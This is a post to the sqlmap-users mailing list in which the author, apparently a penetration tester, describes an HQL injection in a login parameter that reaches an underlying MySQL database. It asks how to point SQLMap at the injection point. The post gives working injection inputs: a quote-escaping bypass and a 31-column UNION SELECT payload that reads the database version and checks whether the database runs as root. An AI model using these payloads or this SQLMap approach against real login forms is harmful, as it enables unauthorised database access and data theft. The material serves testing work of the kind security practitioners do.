I've just found an instance of Hibernate Query Language injection that lets
me get at an underlying MySQL database if I inject in the right way, some
examples I've got are:
loginName=a - works and gives 200
loginName=' - fails with HQL error and 500
loginName=a' or 'a'='a - works and gives 200
loginName=a\'' - gets through HQL and then generates a MySQL error in a
where clause. The injection gets converted to where NAME='a\'''
With some playing I've found that this is a valid injection and they are
running as root as I get a 500 back when I supply root, a 200 when give
something else.
loginName=a' and 'a\''="a" union select
@@version,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2,3,4,5,"2001-01-01",2,3,"2001-01-01","2001-01-01"
from users where user()="root@localhost" -- '='1
The 500 is because some of the stuff from the union isn't being handled
correctly by the page, the 200 is because the union doesn't return any data
so the first bit (basically a=a) is returning valid data so getting through
the rest of the parsing.
So I think what I need to do is to tell SQLMap that it is a union injection
with 31 fields and that the injection needs to go into here:
loginName=a' and 'a\''="a" <INJECT> -- '='1
Can I do this?
I've got all this set up and running in Burp so I can test things out if
anyone needs me to.
Robin
------------------------------------------------------------------------------
Check out the vibrant tech community on one of the world's most
engaging tech sites, SlashDot.org! http://sdm.link/slashdot
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
